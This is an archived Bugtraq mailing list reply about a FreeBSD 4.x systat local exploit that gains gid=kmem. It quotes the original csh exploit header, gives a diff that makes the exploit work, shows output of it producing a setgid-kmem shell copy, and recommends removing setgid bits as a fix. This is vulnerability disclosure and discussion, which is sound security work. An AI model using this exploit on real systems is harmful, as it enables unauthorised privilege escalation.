[17149] in bugtraq
Re: FreeBSD 4.x systat exploit
daemon@ATHENA.MIT.EDU (Steve Reid)
Tue Oct 10 23:59:19 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-ID: <20001010182844.F9112@grok>
Date: Tue, 10 Oct 2000 18:28:44 -0700
Reply-To: Steve Reid <sreid@SEA-TO-SKY.NET>
From: Steve Reid <sreid@SEA-TO-SKY.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20001010145217.I94343@riget.scene.pl>; from Przemyslaw Frasunek
on Tue, Oct 10, 2000 at 02:52:17PM +0200
On Tue, Oct 10, 2000 at 02:52:17PM +0200, Przemyslaw Frasunek wrote:
> #!/bin/csh
>
> # (c) 2000 Przemys?aw Frasunek <venglin@freebsd.lublin.pl>
> #
> # FreeBSD 4.x systat gid=kmem exploit
> # Idea by: Jouko Pynnönen <jouko@SOLUTIONS.FI>
> #
> # Dedicated to ksm.
[etc]
It doesn't work as posted. But that doesn't mean systat is safe, it
just means you aren't "venglin":
--- exploit.csh.orig Tue Oct 10 17:42:49 2000
+++ exploit.csh Tue Oct 10 17:46:53 2000
@@ -11,7 +11,7 @@
#!/bin/csh
cp /bin/csh /tmp
-/usr/sbin/chown venglin.kmem /tmp/csh
+chgrp kmem /tmp/csh
chmod 2755 /tmp/csh
__EOF__
And now it works:
steve@grok:/home/steve% ./exploit.csh
-rwxr-sr-x 1 steve kmem 622908 Oct 10 18:15 /tmp/csh
steve@grok:/home/steve% uname -srm
FreeBSD 4.1-RELEASE i386
BTW, /usr/bin/top is also linked to ncurses. I don't know if it's
vunlerable or not (the exploit does nothing to top in my limited
testing) but it might be prudent to remove the setgid bit from it too.
chmod a-s /usr/bin/systat /usr/bin/top
